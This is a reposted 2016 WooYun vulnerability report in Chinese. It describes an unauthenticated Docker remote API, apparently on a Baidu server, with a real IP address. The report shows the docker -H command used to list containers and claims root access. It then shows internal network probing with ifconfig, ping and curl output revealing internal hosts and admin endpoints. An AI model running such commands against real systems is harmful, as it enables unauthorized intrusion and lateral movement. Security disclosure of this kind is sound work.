神刀安全网

漏洞标题: 新姿势之获取百度机器root权限

漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

请允许我再刷一个~
什么时候有first blood效果
预告!drops分析文章即将发布

详细说明:

docker remote api未授权访问

code 区域
http://180.76.161.55:2375

查看运行的容器

code 区域
docker -H tcp://180.76.161.55:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d294b4eed64f registry.bae.bj.baidubce.com/public/ubuntu12.04_web_php5.5:6653-91 "/usr/bin/tini -- /us" 7 weeks ago Up 7 weeks 0.0.0.0:8888->8080/tcp grave_williams
e6ba8c1ca7e8 swarm "/swarm join --advert" 7 weeks ago Up 7 weeks 2375/tcp sick_lichterman

域名证明为百度

code 区域
registry.bae.bj.baidubce.com

拿root权限,过程请参考之后发布的drops文章

ifconfig

code 区域
[email protected]:~# ifconfig
docker0 Link encap:Ethernet HWaddr 02:42:df:68:95:78
inet addr:172.17.0.1 Bcast:0.0.0.0 Mask:255.255.0.0
inet6 addr: fe80::42:dfff:fe68:9578/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:933462 errors:0 dropped:0 overruns:0 frame:0
TX packets:889024 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:77456385 (77.4 MB) TX bytes:119620987 (119.6 MB)

eth0 Link encap:Ethernet HWaddr fa:16:3e:75:d9:b9
inet addr:192.168.2.189 Bcast:192.168.255.255 Mask:255.255.0.0
inet6 addr: fe80::f816:3eff:fe75:d9b9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1400 Metric:1
RX packets:13544982 errors:0 dropped:0 overruns:0 frame:0
TX packets:11278565 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2681279156 (2.6 GB) TX bytes:2649540661 (2.6 GB)

registry.bae.bj.baidubce.com内网ip 10.16.83.153

code 区域
[email protected]:~# ping registry.bae.bj.baidubce.com
PING registry.bae.bj.baidubce.com (10.16.83.153) 56(84) bytes of data.
64 bytes from 10.16.83.153: icmp_req=1 ttl=61 time=0.300 ms
64 bytes from 10.16.83.153: icmp_req=2 ttl=61 time=0.314 ms
64 bytes from 10.16.83.153: icmp_req=3 ttl=61 time=0.274 ms

经过测试发现与

WooYun: 一不小心走进了百度内网

漏洞在同一网段

code 区域
[email protected]:~# curl 10.16.83.164:8080
__ _ __
/ /_ ____ _(_)___/ /_ __ _________ _____
/ __ // __ `/ / __ / / / /_____/ ___/ __ // ___/
/ /_/ / /_/ / / /_/ / /_/ /_____/ / / /_/ / /__
/_.___//__,_/_//__,_//__,_/ /_/ / .___//___/
/_/
User Manual : http://wiki.baidu.com/display/RPC

/status : Status of services
/connections : List all connections
/flags : List all gflags
/flags/port : List the gflag
/flags/guard_page_size;help* : List multiple gflags with glob patterns (Use $ instead of ? to match single character)
/flags/NAME?setvalue=VALUE : Change a gflag, validator will be called. User is responsible for thread-safety and consistency issues.
/vars : List all exposed bvars
/vars/rpc_num_sockets : List the bvar
/vars/rpc_server*_count;iobuf_blo$k_* : List multiple bvars with glob patterns (Use $ instead of ? to match single character)
/rpcz : Recent RPC calls(disabled)
/rpcz/stats : Statistics of rpcz
/rpcz?time=2016/05/17-00:05:28 : RPC calls before the time
/rpcz?time=2016/05/17-00:05:28&max_scan=10 : N RPC calls at most before the time
Other filters: min_latency, min_request_size, min_response_size, log_id, error_code
/rpcz?trace=N : Recent RPC calls whose trace_id is N
/rpcz?trace=N&span=M : Recent RPC calls whose trace_id is N and span_id is M
/hotspots/cpu : Profiling CPU (disabled)
/hotspots/heap : Profiling heap (disabled)
/hotspots/growth : Profiling growth of heap (disabled)
curl -H 'Content-Type: application/json' -d 'JSON' 10.63.28.21:8002/ServiceName/MethodName : Call method by http+json
/version : Version of this server, set by Server::set_version()
/health : Test healthy
/vlog : List all VLOG callsites
/sockets : Check status of a Socket
/bthreads : Check status of a bthread
/ids : Check status of a bthread_id
/protobufs : List all protobuf services and messages
/list : json signature of methods
/threads : Check pstack (disabled)
/dir : Browse directories and files (disabled)

code 区域
[email protected]:~# curl 10.16.83.151
[cf971f2d3a042b53308e9696d4923bdb] Not allowed to access builtin services, try ServerOptions.internal_port=8222 instead if you're inside Baidu's network

已证明,不再深入

漏洞证明:

修复方案:

版权声明:转载请注明来源 黑客,绝对是黑客@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 新姿势之获取百度机器root权限

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址